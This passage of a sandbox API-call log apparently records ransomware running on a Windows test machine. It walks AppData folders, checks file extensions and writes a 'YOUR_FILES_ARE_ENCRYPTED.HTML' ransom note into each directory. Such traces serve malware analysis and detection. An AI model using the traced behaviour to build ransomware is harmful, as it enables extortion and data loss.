(pszPath="WindowsMail.MSMessageStore") returned=".MSMessageStore" [0163.842] lstrlenW (lpString=".MSMessageStore") returned 15 [0163.842] PathFindExtensionW (pszPath="WindowsMail.MSMessageStore") returned=".MSMessageStore" [0163.842] FindNextFileW 
(in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xd249af30, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd249af30, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd4875a90, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="WindowsMail.pat", cAlternateFileName="WINDOW~1.PAT")) returned 1 [0163.842] wnsprintfW (in: pszDest=0x75f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\WindowsMail.pat") returned 76 [0163.842] lstrcmpW (lpString1="WindowsMail.pat", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0163.842] PathFindExtensionW (pszPath="WindowsMail.pat") returned=".pat" [0163.842] lstrlenW (lpString=".pat") returned 4 [0163.842] PathFindExtensionW (pszPath="WindowsMail.pat") returned=".pat" [0163.842] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xd249af30, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd249af30, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd4875a90, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="WindowsMail.pat", cAlternateFileName="WINDOW~1.PAT")) returned 0 [0163.842] FindClose (in: hFindFile=0x42f3200 | out: hFindFile=0x42f3200) returned 1 [0163.842] wnsprintfW (in: pszDest=0x75f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 90 [0163.842] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: 
"c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\windows mail\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4a8 [0163.843] WriteFile (in: hFile=0x4a8, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd808, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd808*=0x3c00, lpOverlapped=0x0) returned 1 [0163.845] CloseHandle (hObject=0x4a8) returned 1 [0163.845] GetProcessHeap () returned 0x270000 [0163.846] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x75f0050 | out: hHeap=0x270000) returned 1 [0163.846] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xd23b66f0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd23b66f0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x86d0cb6d, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xffe64ae6, dwReserved1=0xffffffff, cFileName="Windows Media", cAlternateFileName="WINDOW~2")) returned 1 [0163.846] wnsprintfW (in: pszDest=0x74081a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Media") returned 61 [0163.846] GetProcessHeap () returned 0x270000 [0163.846] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x75f0050 [0163.846] lstrcpyW (in: lpString1=0x75f0050, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Media" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Media") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Media" [0163.846] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Media", lpString2="\\*" | out: 
lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Media\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Media\\*" [0163.846] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Media\\*", lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xd23b66f0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd23b66f0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x86d0cb6d, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3200 [0163.847] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xd23b66f0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd23b66f0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x86d0cb6d, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0163.847] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xd23b66f0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd249af30, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x892d68f3, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="12.0", cAlternateFileName="")) returned 1 [0163.847] wnsprintfW (in: pszDest=0x75f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Media\\12.0") returned 66 [0163.847] GetProcessHeap () returned 
0x270000 [0163.847] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74c2008 [0163.847] lstrcpyW (in: lpString1=0x74c2008, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Media\\12.0" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Media\\12.0") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Media\\12.0" [0163.847] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Media\\12.0", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Media\\12.0\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Media\\12.0\\*" [0163.847] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Media\\12.0\\*", lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xd23b66f0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd249af30, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x892d68f3, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3240 [0163.848] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xd23b66f0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd249af30, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x892d68f3, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0163.848] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2020, 
ftCreationTime.dwLowDateTime=0xd249af30, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd249af30, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x86d0cb6d, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x1f2, dwReserved0=0x0, dwReserved1=0x60, cFileName="WMSDKNS.DTD", cAlternateFileName="")) returned 1 [0163.848] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Media\\12.0\\WMSDKNS.DTD") returned 78 [0163.848] lstrcmpW (lpString1="WMSDKNS.DTD", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0163.848] PathFindExtensionW (pszPath="WMSDKNS.DTD") returned=".DTD" [0163.848] lstrlenW (lpString=".DTD") returned 4 [0163.848] PathFindExtensionW (pszPath="WMSDKNS.DTD") returned=".DTD" [0163.848] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xd249af30, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd249af30, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8928a632, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x27cf, dwReserved0=0x0, dwReserved1=0x60, cFileName="WMSDKNS.XML", cAlternateFileName="")) returned 1 [0163.848] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Media\\12.0\\WMSDKNS.XML") returned 78 [0163.848] lstrcmpW (lpString1="WMSDKNS.XML", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0163.848] PathFindExtensionW (pszPath="WMSDKNS.XML") returned=".XML" [0163.848] lstrlenW (lpString=".XML") returned 4 [0163.848] PathFindExtensionW (pszPath="WMSDKNS.XML") returned=".XML" [0163.848] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: 
lpFindFileData=0x4ebd230*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xd249af30, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd249af30, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8928a632, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x27cf, dwReserved0=0x0, dwReserved1=0x60, cFileName="WMSDKNS.XML", cAlternateFileName="")) returned 0 [0163.848] FindClose (in: hFindFile=0x42f3240 | out: hFindFile=0x42f3240) returned 1 [0163.849] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Media\\12.0\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 96 [0163.849] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Media\\12.0\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\windows media\\12.0\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x58c [0163.849] WriteFile (in: hFile=0x58c, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd4fc, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd4fc*=0x3c00, lpOverlapped=0x0) returned 1 [0163.852] CloseHandle (hObject=0x58c) returned 1 [0163.852] GetProcessHeap () returned 0x270000 [0163.853] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74c2008 | out: hHeap=0x270000) returned 1 [0163.853] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xd23b66f0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd249af30, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x892d68f3, ftLastWriteTime.dwHighDateTime=0x1cb88f5, 
nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="12.0", cAlternateFileName="")) returned 0 [0163.853] FindClose (in: hFindFile=0x42f3200 | out: hFindFile=0x42f3200) returned 1 [0163.853] wnsprintfW (in: pszDest=0x75f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Media\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 91 [0163.853] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Media\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\windows media\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4a8 [0163.854] WriteFile (in: hFile=0x4a8, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd808, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd808*=0x3c00, lpOverlapped=0x0) returned 1 [0163.856] CloseHandle (hObject=0x4a8) returned 1 [0163.856] GetProcessHeap () returned 0x270000 [0163.857] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x75f0050 | out: hHeap=0x270000) returned 1 [0163.857] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xd23b66f0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd249af30, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8c2982ab, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xffe64ae6, dwReserved1=0xffffffff, cFileName="Windows Sidebar", cAlternateFileName="WINDOW~1")) returned 1 [0163.857] wnsprintfW (in: pszDest=0x74081a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Sidebar") returned 63 
[0163.857] GetProcessHeap () returned 0x270000 [0163.857] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x75f0050 [0163.857] lstrcpyW (in: lpString1=0x75f0050, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Sidebar" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Sidebar") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Sidebar" [0163.857] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Sidebar", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Sidebar\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Sidebar\\*" [0163.857] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Sidebar\\*", lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xd23b66f0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd249af30, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8c2982ab, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3200 [0163.858] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xd23b66f0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd249af30, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8c2982ab, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0163.858] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2010, 
ftCreationTime.dwLowDateTime=0xd23b66f0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd23b66f0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8c2982ab, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="Gadgets", cAlternateFileName="")) returned 1 [0163.858] wnsprintfW (in: pszDest=0x75f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Sidebar\\Gadgets") returned 71 [0163.858] GetProcessHeap () returned 0x270000 [0163.858] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74c2008 [0163.858] lstrcpyW (in: lpString1=0x74c2008, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Sidebar\\Gadgets" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Sidebar\\Gadgets") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Sidebar\\Gadgets" [0163.858] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Sidebar\\Gadgets", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Sidebar\\Gadgets\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Sidebar\\Gadgets\\*" [0163.858] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Sidebar\\Gadgets\\*", lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xd23b66f0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd23b66f0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8c2982ab, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3240 [0163.859] 
FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xd23b66f0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd23b66f0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8c2982ab, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0163.859] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xd23b66f0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd23b66f0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8c2982ab, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 0 [0163.859] FindClose (in: hFindFile=0x42f3240 | out: hFindFile=0x42f3240) returned 1 [0163.859] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Sidebar\\Gadgets\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 101 [0163.859] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Sidebar\\Gadgets\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\windows sidebar\\gadgets\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x58c [0163.859] WriteFile (in: hFile=0x58c, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd4fc, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd4fc*=0x3c00, lpOverlapped=0x0) returned 1 [0163.861] 
CloseHandle (hObject=0x58c) returned 1 [0163.999] GetProcessHeap () returned 0x270000 [0164.012] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74c2008 | out: hHeap=0x270000) returned 1 [0164.018] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xd249af30, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd249af30, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8c2982ab, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x54, dwReserved0=0x0, dwReserved1=0x60, cFileName="Settings.ini", cAlternateFileName="")) returned 1 [0164.018] wnsprintfW (in: pszDest=0x75f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Sidebar\\Settings.ini") returned 76 [0164.018] lstrcmpW (lpString1="Settings.ini", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0164.018] PathFindExtensionW (pszPath="Settings.ini") returned=".ini" [0164.018] lstrlenW (lpString=".ini") returned 4 [0164.018] PathFindExtensionW (pszPath="Settings.ini") returned=".ini" [0164.018] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xd249af30, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd249af30, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8c2982ab, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x54, dwReserved0=0x0, dwReserved1=0x60, cFileName="Settings.ini", cAlternateFileName="")) returned 0 [0164.018] FindClose (in: hFindFile=0x42f3200 | out: hFindFile=0x42f3200) returned 1 [0164.019] wnsprintfW (in: pszDest=0x75f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows 
Sidebar\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 93 [0164.019] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Sidebar\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\windows sidebar\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4a8 [0164.020] WriteFile (in: hFile=0x4a8, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd808, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd808*=0x3c00, lpOverlapped=0x0) returned 1 [0164.022] CloseHandle (hObject=0x4a8) returned 1 [0164.022] GetProcessHeap () returned 0x270000 [0164.023] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x75f0050 | out: hHeap=0x270000) returned 1 [0164.024] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xd23b66f0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd249af30, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8c2982ab, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xffe64ae6, dwReserved1=0xffffffff, cFileName="Windows Sidebar", cAlternateFileName="WINDOW~1")) returned 0 [0164.024] FindClose (in: hFindFile=0x42f31c0 | out: hFindFile=0x42f31c0) returned 1 [0164.024] wnsprintfW (in: pszDest=0x74081a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 77 [0164.024] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, 
